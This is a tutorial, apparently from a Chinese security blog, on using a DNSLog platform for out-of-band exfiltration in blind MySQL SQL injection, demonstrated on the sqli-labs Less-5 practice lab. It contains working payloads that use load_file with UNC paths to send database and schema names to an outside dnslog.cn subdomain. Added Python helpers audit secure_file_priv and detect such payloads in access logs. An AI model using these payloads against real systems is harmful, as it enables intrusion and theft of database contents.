DNSLog Vulnerability Detection (7) SQL Injection Vulnerability Practice

In the previous articles we learned how to use the DNSLog platform with XSS, RCE, XXE and SSRF vulnerabilities. When these vulnerabilities are triggered, the vulnerable code itself parses a URL and initiates a network request, so as long as we send the subdomain obtained from the DNSLog platform to the vulnerable server, a DNSLog resolution record is generated, which proves that the vulnerability exists.

In this article we look at how the DNSLog platform is used with SQL injection. Using DNSLog for SQL injection differs from the XSS, RCE, XXE and SSRF cases: when the SQL injection has no echo, we can use the DNSLog platform to bring some database information out of the server.

MySQL load_file function

In MySQL, load_file is a function for reading files from disk. The following SQL statements read a sample file on each operating system.

# Windows
select load_file('C:/Windows/system.ini');
# Linux
select load_file('/etc/hosts');

To read a file with load_file in MySQL, the following conditions must be met:

  1. The file must be on the database server itself
  2. The database user must have permission to access the file
  3. The file must be smaller than max_allowed_packet, otherwise NULL is returned.

The max_allowed_packet limit of the database version used here is shown in the screenshot; the default size is generally 32MB.

secure_file_priv parameter

In addition to reading files, MySQL can also write files. Both operations are restricted by the secure_file_priv parameter, which has three possible values. When secure-file-priv="", we can import and export any file.

Value                                 Meaning
secure-file-priv=""                   No restrictions (unsafe)
secure-file-priv="<specific folder>"  Import and export only within the specified folder
secure-file-priv=NULL                 Import and export not allowed

We can query the current value of this parameter in MySQL with the following statement

show variables like '%secure_file_priv%';
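As an added example (not from the original article), the following Python helper turns the three-row table above into an audit check: it classifies a secure_file_priv value as returned by the statement above and tells whether a given path, including the UNC host path used later in this article, would get past that setting. The folder and file names are constructed for the example.

```python
import posixpath

# Added example, not from the original article: classify the value returned by
# `SHOW VARIABLES LIKE 'secure_file_priv'` into the three states from the table
# above and decide whether load_file(path) would get past that restriction.
# The FILE privilege is a separate gate and is not modelled here.

UNRESTRICTED, RESTRICTED, DISABLED = "unrestricted", "restricted", "disabled"


def classify_secure_file_priv(value):
    """Map the raw variable value to one of the three documented states."""
    if value is None or value.strip().upper() == "NULL":
        return DISABLED        # import and export not allowed at all
    if value.strip() == "":
        return UNRESTRICTED    # any file the server process can reach (unsafe)
    return RESTRICTED          # only files inside the configured folder


def is_unc_path(path):
    """UNC host paths (\\\\host\\share or //host/share) are what the DNSLog trick uses."""
    return path.startswith("\\\\") or path.startswith("//")


def load_file_reachable(value, path):
    """True if secure_file_priv alone would not block load_file(path)."""
    state = classify_secure_file_priv(value)
    if state == DISABLED:
        return False
    if state == UNRESTRICTED:
        return True            # the setting the article's walkthrough relies on
    # RESTRICTED: the target must lie inside the configured folder. A UNC
    # path points at another host, so it can never satisfy that.
    if is_unc_path(path):
        return False
    base = posixpath.normpath(value.replace("\\", "/")) + "/"
    norm = posixpath.normpath(path.replace("\\", "/"))
    return norm.startswith(base)


def hardening_advice(value):
    """One-line recommendation per state, for an audit report."""
    state = classify_secure_file_priv(value)
    if state == UNRESTRICTED:
        return "set secure_file_priv to a dedicated folder or NULL"
    if state == RESTRICTED:
        return "ok: confined to %s" % value
    return "ok: file import/export disabled"
```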

DNSLog injection steps (MySQL on Windows only)

First, we open the DNSLog platform and click Get SubDomain to obtain a subdomain name. The subdomain address we obtained here is 9asrrv.dnslog.cn


Then replace the file to be read with the subdomain obtained from the DNSLog platform. Note that \\\\ in the string literal becomes \\ after MySQL unescapes it, which is the prefix of the UNC path format commonly used on Windows; the trailing /test must also be written, since it stands for a folder name in the UNC path (the folder name itself can be anything, only the format matters). The whole statement therefore tries to read a folder on a remote host. Because that host is our DNSLog subdomain, the server resolves it when the statement runs and a resolution record appears on the platform.

# Original payload: the UNC prefix is written as \\\\ inside the MySQL string literal
select load_file('\\\\xxxxx.dnslog.cn/test');
# Payload used in this article
select load_file('\\\\9asrrv.dnslog.cn/test');

Next we execute the statement


Now we return to the DNSLog platform and click Refresh Record to refresh. At this time, the DNSLog platform will generate DNSLog parsing records.


This means that when we find a SQL injection vulnerability with no echo, we can splice such a statement into the vulnerable parameter at the submission point, whether it is a GET or a POST request; as long as the server executes the statement and a DNSLog resolution record appears on the platform, the vulnerability is proven to exist.

Next, we use the sqli-labs practice environment for a demonstration. The level used in this experiment is the fifth level of sqli-labs (Less-5).


When our parameter is id=1 the page displays normally, but when we change the parameter to id=1' the page produces an error


When we change the parameter to id=1' --+ the page displays normally again


Once we have tried such statements we can determine that a SQL injection vulnerability exists, but no data is echoed back to us. This is what is usually called SQL injection without echo. In this situation we normally fall back on blind injection, but this article shows how to use the DNSLog platform to handle a SQL injection vulnerability without echo and bring some information out of the database.

First, we open the DNSLog platform and click Get SubDomain to obtain a subdomain name. The subdomain name address we obtained here is 900ind.dnslog.cn


Then submit the following payload to the injection point where the SQL vulnerability exists

# Original payload (database() is called as a function, not quoted as a string)
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('\\\\',database(),'.xxxxx.dnslog.cn/wuya'))),1,0) --+
# Payload used in this article
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('////',database(),'.900ind.dnslog.cn/wuya'))),1,0) --+


Now we return to the DNSLog platform and click Refresh Record. The platform shows a resolution record whose hostname carries the name of the current database.


If we want to obtain the name of the second database, we can use the following statement

# Original payload
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('\\\\',(select schema_name from information_schema.schemata limit 1,1),'.xxxxx.dnslog.cn/test'))),1,0) --+
# Payload used in this article
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('////',(select schema_name from information_schema.schemata limit 1,1),'.900ind.dnslog.cn/wuya'))),1,0) --+

Submit the payload to the injection point with the SQL vulnerability


Now we return to the DNSLog platform and click Refresh Record. The platform shows a resolution record whose hostname carries the name of the second database.


In short, this is the idea behind using the DNSLog platform to handle SQL injection without echo. As for the exact statements to use, that is left to the experts to apply as they see fit.
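As an added example that is not part of the original article, here is a small detector a defender could run over web server access logs to spot the DNSLog-style payloads shown above (a load_file call on a UNC or //host path) and extract the DNS zone the data would be sent to. The log lines and IP address are constructed samples; the payloads mirror the ones in this article.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the original article: scan web access-log lines for
# the DNSLog-style out-of-band SQL injection payload described above, i.e. a
# load_file() call on a UNC or //host path, and extract the DNS zone the data
# would be sent to. Hostnames and log lines below are constructed samples.

SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli-labs/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20if((select%20load_file(concat(%27////%27,database(),%27.900ind.dnslog.cn/wuya%27))),1,0)%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20if((select%20load_file(concat(%27%5C%5C%5C%5C%27,(select%20schema_name%20from%20information_schema.schemata%20limit%201,1),%27.900ind.dnslog.cn/test%27))),1,0)%20--+ HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')   # query string only; bodies are not logged
LOAD_FILE_RE = re.compile(r"load_file\s*\(", re.I)
# dotted hostname immediately followed by a path separator, as in host.zone/share
HOST_RE = re.compile(r"\.?([a-z0-9-]+(?:\.[a-z0-9-]+)+)[/\\]", re.I)


def decode_target(line):
    """URL-decoded request target of an access-log line, or None."""
    m = REQUEST_RE.search(line)
    return unquote_plus(m.group(1)) if m else None


def find_oob_load_file(line):
    """Return (dns_zone, decoded_request) for an OOB load_file payload, else None."""
    target = decode_target(line)
    if not target or not LOAD_FILE_RE.search(target):
        return None
    if "\\\\" not in target and "//" not in target:
        return None  # load_file() on a local path: still bad, but not out-of-band
    host = HOST_RE.search(target)
    return (host.group(1).lower() if host else None, target)


def scan(log_text):
    """All OOB hits in a log, oldest first."""
    hits = []
    for line in log_text.strip().splitlines():
        hit = find_oob_load_file(line)
        if hit:
            hits.append(hit)
    return hits
```

The extracted zone is what to look for in DNS resolver logs from the database host: any query for a subdomain of it carries the leaked value as its first label.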

Source: blog.csdn.net/qq_64973687/article/details/134988713